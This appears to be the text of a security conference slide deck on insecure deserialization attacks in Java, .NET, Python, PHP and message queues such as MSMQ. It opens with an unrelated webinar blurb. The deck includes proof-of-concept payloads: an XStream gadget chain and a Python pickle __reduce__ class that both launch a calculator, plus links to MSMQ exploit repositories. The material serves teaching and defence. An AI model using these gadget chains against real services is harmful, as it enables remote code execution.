We’ll wrap up with a live Q&A session where you can engage with our experts on your specific use cases, and learn more about optimizing your data workflows with AI.
This webinar is ideal for professionals seeking to harness the power of AI within their data management systems while ensuring high levels of customization and security. Whether you're a novice or an expert, gain actionable insights and strategies to elevate your data processes. Join us to see how FME and AI can revolutionize how you work with data!
2. Intro to Serialization/Deserialization
Overview
In Code
Real-Life Scenarios
Languages, Frameworks, Exploitation
Java
.NET
Python
PHP?
Go?
Built-in Deserialization Attacks
Conclusions
Best Practices and Mitigation Basics
AGENDA
3. You’ll probably enjoy this most if you have:
Some familiarity with code
Fundamental exploitation
Chill regarding over-simplifications
The ability to GO FAST, because we gonna
ASSUMPTIONS
4. AppSec Researcher TL @ Checkmarx (2 yrs)
Formerly a Senior Consultant @ Cisco’s
COE – RT, PT (2.5 yrs)
7 years actively poking s*it until it
explodes
Father of one epic girl and one shaggy
doggo
Verbose AF
Opinions (and naughty words) are my own
and do not reflect my employer’s, obviously
ABOUT ME
DorTumarkin
Dor.Tumarkin@Checkmarx.com
5. "Serialization is the process of translating data
structures or object state into a format that
can be stored or transmitted and
reconstructed later."
- Wikipedia
6. INTRO TO SERIALIZATION
Can be divided into 3 types of serialization formats
Language native – specific for a language
7. INTRO TO SERIALIZATION
Can be divided into 3 types of serialization formats
Language Native – specific for a language
Generic – CSV, JSON, YAML, XML
8. INTRO TO SERIALIZATION
Can be divided into 3 types of serialization formats
Language Native – specific for a language
Generic – CSV, JSON, YAML, XML
Specialized – Protobuf, MessagePack, CBOR (Out of scope)
9. INTRO TO DESERIALIZATION
The serialized object can then be transmitted over a
network, stored in a file, written to a DB
Most standard serializers will work with all native
serializable data structures, which can, themselves,
often reference almost any class.
10. INTRO TO DESERIALIZATION
It’s kind of like making Soup in a Cup
You take a bowl of soup
And you dehydrate it into a powder
Checkmarx is not sponsored by any soup vendors
All rights belong to their respective owners
12. DESERIALIZATION IN CODE
A basic example of Deserialization
in Java, using XStream, a very
popular XML serializer:
1. int id = 1;
2. String name = "John Doe";
3. String address = "1 Elm St.";
4. String[] items = new String[] {"Alarm Clock", "Baseball Bat"} ;
5. ATestingClass testingObj = new ATestingClass(id, name, address, items);
6. XStream xstream = new XStream();
7. System.out.println(xstream.toXML(testingObj));
13. DESERIALIZATION IN CODE
The console output is:
<ATestingClass>
<id>1</id>
<name>John Doe</name>
<address>1 Elm St.</address>
<items>
<string>Alarm Clock</string>
<string>Baseball Bat</string>
</items>
</ATestingClass>
This format can be easily transmitted, stored, etc.
14. DESERIALIZATION IN CODE
This object can then be reconstructed from the XML
XStream produced earlier:
1 ATestingClass newATestingClass =
2 (ATestingClass)xstream.fromXML(serializedATestingClass);
3
4 System.out.println(newATestingClass.getName());
Which would produces the following output:
John Doe
15. DESERIALIZATION CAVEATS
The most significant thing to
consider here is that a class must
be identical in types between
both source (serialized) and
destination (deserialized) –
otherwise, errors may occur
16. REAL WORLD USE CASES
APIs – for example, Struts2 Rest API
uses deserialization to convert XMLs to
objects
Saving current application state to a
file/DB
17. REAL WORLD USE CASES
Server-to-Server distributed workload -
e.g Pickling in Python is often
used to distribute workload
across processes and systems
Many more!
19. REAL WORLD USE CASES
Server-to-Server distributed workload -
e.g Pickling in Python is often
used to distribute workload
across processes and systems
Many more!
20. The serialized object can then be transmitted over a
network, stored in a file, written to a DB
Most standard serializers will work with all native
serializable data structures, which can, themselves,
often reference
INTRO TO DESERIALIZATION
almost any class.
22. ACKNOWLEDGEMEN
TS
• Marshalling Pickles
• ysoserial
Chris Frohoff
• Friday the 13th JSON Attacks
• ysoserial.netObjectDataProvider
Oleksandr Mirosh
Alvaro Munoz
• Are You My Type? Breaking .NET Through
Serialization
• ysoserial.netTypeConfuseDelegate
James Forshaw
• Disclosing CVE-2017-9805 & Exploit Gadget Man Yue Mo
29. EXPLOITATION – GO GO GADGET!
This is an example of an
Apache Commons based
gadget chain (more later)
Commons is very popular
Part of Struts2 already
Very difficult to detect with
heuristics
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value
class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource
class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator" />
<next class="java.lang.ProcessBuilder">
<command>
<string>cmd</string>
<string>/c</string>
<string>calc</string>
31. DESERIALIZATION EXPLOITATION
What just happened…?
The naïve deserializer inside Struts2’s Rest
API (which is, again, XStream) does not
restrict which classes that can be
deserialized by XStream!
And calls the default XStream constructor:
33. EXPLOITATION – GO GO GADGET!
Gadget Chains are a nickname for
nested, serialized objects
Chains what deserialization does:
Sets instance variables
Instance methods are
automatically invoked
35. EXPLOITATION – GO GO GADGET!
They can become extremely difficult to design
Must live off the land - use available classes
Must parse
However- don’t always have to complete
deserialization
42. .NET GADGETS
“Safe” deserialization is possible:
Implementation uses the generic notation as the
expected Type, and fails on time
Without it, anything gets deserialized
There are ways to have multiple types, of course
The bigger issue is – usage is vague
Good
43. .NET GADGETS
What exception was thrown?
Since casting was of the wrong object, an
exception occurred
TOO LATE
47. DESERIALIZATION IN PYTHON
Strictly typed languages would
have an easier time at looking
ahead at classes during
construction
Untyped languages, on the other
hand…
50. DESERIALIZATION IN PYTHON
Generating a Python gadget for pickles is simple:
__reduce__ provides the Pickle-able form of a method and
args tuple
Basically spring-loaded code injection bombs
class RunCalc(object):
def __reduce__(self):
return (os.system, (["calc.exe"],))
print pickle.dumps(RunGnomeCalc())
51. DESERIALIZATION IN UNTYPED LANGUAGES
PHP built-in deserialization is
very… specific?
Deserialization only triggers
specific magic methods
(__wakeup, __destruct)
Sets members without
constructor
52. DESERIALIZATION IN UNTYPED LANGUAGES
PHP’s own limitationsdesign saves it:
Built-in methods are actually “language
constructs”
Not part of any class
Essentially “white-lists” to custom classes
Can still be exploited under certain
conditions for many things, including RCE
…contextually, more-so than Java/.NET
53. POP QUIZ
How would deserialization in Go look like?
More or less complicated to exploit?
54. ROOT CAUSE
At this point some common threads are
very noticeable:
Deserialization streamlines object
construction from string/bytes
Dangerous IFF you naïvely deserialize
tainted inputs! Never trust those!
Remote naïve deserialization is super
dangerous, tons of RCE samples
55. ROOT CAUSE
But in many cases deserialization is
only local or trusted
And there are alternatives in APIs
Not like there are whole technologies
designed to distribute objects via
serialization, right?
58. MESSAGE QUEUES
Message Queues literally distribute
messages via a queue
Agnostic MQs just send strings or bytes
(Rabbit, Kafka), which can be wrapped
with senders and receivers
59. DESERIALIZATION IN MESSAGE QUEUES
But some allow sending objects!
End-to-End:
Serialize
Publish
Subscribe
Deserialize
So… are end-to-end object MQs
basically an RCE delivery system?
60. DESERIALIZATION IN MESSAGE QUEUES
Java’s JMS is well documented as vulnerable
Many Java samples available
“Pwning Your Java Messaging” – BH2016, by Matthias Kaiser
public void onMessage(Message message) {
try {
ObjectMessage objectMessage = (ObjectMessage) message;
objectMessage.getObject(); //BOOM
61. DESERIALIZATION IN MESSAGE QUEUES
Begs the question - what about
.NET?
It has Microsoft Message Queue!
(MSMQ)
Ancient
Still in use though :D
62. DESERIALIZATION IN MESSAGE QUEUES
MSMQ Server is a
Windows Feature
Uses two object
serialization formatters:
XML
Binary
63. DESERIALIZATION IN MESSAGE QUEUES
Embarked on some Research™!
The only reference we found to these
formatters in a security context was:
70. DESERIALIZATION IN MESSAGE QUEUES
MSDN samples being dangerous isn’t
great
But is this enough? Is there
something a little more official?
Maybe it’s just bad because of
brevity?
76. MSMQ EXPLOITATION DEMO
Exploit utilizes ysoserial.netTypeConfuseDelegate gadget
as message body to attack .NET 4
https://github.com/Dor-Tumarkin/MSMQ-
BinaryMessageFormatter-Exploit-for-.NET-4.5
Also successfully modified the
ysoserial.netActivitySurrogateSelector gadget to work
with original target version, .NET 3.5
https://github.com/Dor-Tumarkin/MSMQ-
BinaryMessageFormatter-Exploit-for-.NET-3.5
77. DESERIALIZATION IN MSMQ
MSMQ with
BinaryMessageFormatter
(BMF):
Exploitable by default
Cannot explicitly set types
Intended for remote use
78. DESERIALIZATION IN MSMQ
In what scenarios is
BinaryMessageFormatter used?
Complex objects
Large messages
High-throughput
Not particularly common in open-source,
though
Observed traces in some middleware
implementations
Also in some workload distribution
code
79. DESERIALIZATION IN MSMQ
It is recommended in various
places, such as O’REILLY’s
“C# Cookbook” (2015 4th
Edition)
85. DESERIALIZATION – OTHER DANGERS
Deserialization errors will
throw exceptions that may
hurt the flow of the
application.
86. DESERIALIZATION – OTHER DANGERS
In some languages or
implementations, the object is
built from reflection, or with
“default” language constructors
…possibly bypassing any setter
or constructor checks
87. DESERIALIZATION – OTHER DANGERS
In other words – can’t assume
anything about values and logic!
89. DESERIALIZATION – AN
INDUSTRY PERSPECTIVE
Critical vulnerabilities found in:
WebLogic
WebSphere
JBoss
Jenkins
OpenNMS
Struts2
Liferay
Coldfusion
Multiple Cisco products
The list goes on.
90. DESERIALIZATION – AN
INDUSTRY PERSPECTIVE
Part of OWASP Top 10 2017!
A8 – Insecure Deserialization
It’s technically “A1 – Injection”
in 2013, but got its own
category in 2017, particularly
with all that media buzz
(and industry tears)
91. DESERIALIZATION – AN
INDUSTRY PERSPECTIVE
Remote Code Execution
“CVSS 10” Vulnerabilities
Complete CIA obliteration
Overwrite/Corrupt Objects
Exceptions, DoS
92. DESERIALIZATION – AN
INDUSTRY PERSPECTIVE
[Java] Serialization
was a horrible mistake
made in 1997 [1] Oracle is planning on
dropping serialization
support in Java.
This does not matter.
[1]-https://www.infoworld.com/article/3275924/java/oracle-
plans-to-dump-risky-java-serialization.html
97. ADDITIONAL MITIGATION STEPS
TEST your deserializers, even when
using well defined white-lists
TEST to fail before object creation
TEST if your deserializer goes
through setters and ctors!
If it doesn’t, re-implement logic
in deserialization
98. MITIGATION BY AVERSION
If you’re still paranoid, maybe build
your own data-to-constructor
transformer instead?
Poor performance
Requires work
Secure(?)
99. CONCLUSIONS
Deserialization is kinda awesome
Too awesome?
Classic automagic!
Deserialization can be deadly
Still a lot of potential areas to explore
Never trust a deserializer – always test it